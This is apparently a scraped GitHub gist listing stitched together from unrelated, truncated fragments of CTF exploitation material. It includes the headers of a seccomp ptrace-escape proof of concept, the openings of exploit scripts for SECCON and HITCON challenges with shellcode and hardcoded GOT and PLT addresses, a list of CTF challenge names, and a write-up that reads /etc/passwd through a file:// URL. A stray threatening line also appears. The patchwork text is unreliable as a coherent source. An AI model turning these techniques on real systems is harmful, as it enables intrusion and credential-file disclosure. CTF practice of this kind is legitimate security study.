Skip to content

Instantly share code, notes, and snippets.

@thejh
thejh / seccomp_ptrace_escape.c
Last active August 19, 2023 11:39
PoC for bypassing seccomp if ptrace is allowed (known, documented issue, even mentioned in the manpage)
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
#include <signal.h>
#include <errno.h>
#include <fcntl.h>
#include <stddef.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/stat.h>
puts "report me and you will find out"
diff --git a/Source/JavaScriptCore/runtime/ArrayPrototype.cpp b/Source/JavaScriptCore/runtime/ArrayPrototype.cpp
index 818895c..4b1278a 100644
--- a/Source/JavaScriptCore/runtime/ArrayPrototype.cpp
+++ b/Source/JavaScriptCore/runtime/ArrayPrototype.cpp
@@ -383,7 +383,7 @@ EncodedJSValue JSC_HOST_CALL arrayProtoFuncJoin(ExecState* exec)
UString separator;
if (!exec->argument(0).isUndefined())
- separator = exec->argument(0).toString(exec)->value(exec);
+ separator = fastJSValuetoUString(exec->argument(0), exec);
from socket import *
from struct import pack, unpack
from commands import getoutput
from time import sleep
buf_clone = 0x080CB960
p = socket(AF_INET, SOCK_STREAM)
p.connect(("ropi.pwn.seccon.jp", 10000))
''''
PwnPineappleApplePwn
https://www.youtube.com/watch?v=0E00Zuayv9Q
''''
from pwn import *
context.arch = 'amd64'
#context.log_level = 'debug'
p = process('./tinypad')
@potetisensei
potetisensei / gist:09b7265bc95dfb000a7c
Last active August 29, 2015 14:24
for this: http://shindanmaker.com/549065 TODO: append CODEGATE 2014 Finals, SECUINSIDE 2014 Finals, DEFCON 2014 Finals, and so on
PlaidDB - Plaid 2015
Prodmanager - Plaid 2015
qttpd - Plaid 2015
tp - Plaid 2015
traveller - Plaid 2015
Weff - CODEGATE 2015
icbm - CODEGATE 2015
beef_steak - CODEGATE 2015
Bookstore - CODEGATE 2015
Olive and Mushroom Pizza - CODEGATE 2015
@g05u
g05u / xpl_callme.py
Last active August 29, 2015 14:05
Callme hitcon-ctf exploit
#!/usr/bin/env python
from nulllife import *
import struct
shellcode = NullShell(name = 'exec', arch = 'x86', os = 'linux').get()
stack_chk_got = 0x0804A018
message_data = 0x0804A070
@g05u
g05u / xpl_rsbo.py
Created August 18, 2014 04:31
Hitcon-ctf rsbo exploit
#!/usr/bin/env python
from struct import *
from nulllife import *
new_ebp = 0x0804a100
plt_read = 0x080483E0
plt_open = 0x08048420
plt_write = 0x08048450
flag_str = 0x080487D0
@noncetonic
noncetonic / DIAGCGI Writeup
Created August 18, 2014 04:46
HITCON 2014 DIAGCGI Writeup
#DIAGCGI
##Arbitrary File Read
```file:///etc/passwd``` and use curl function shows us
```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin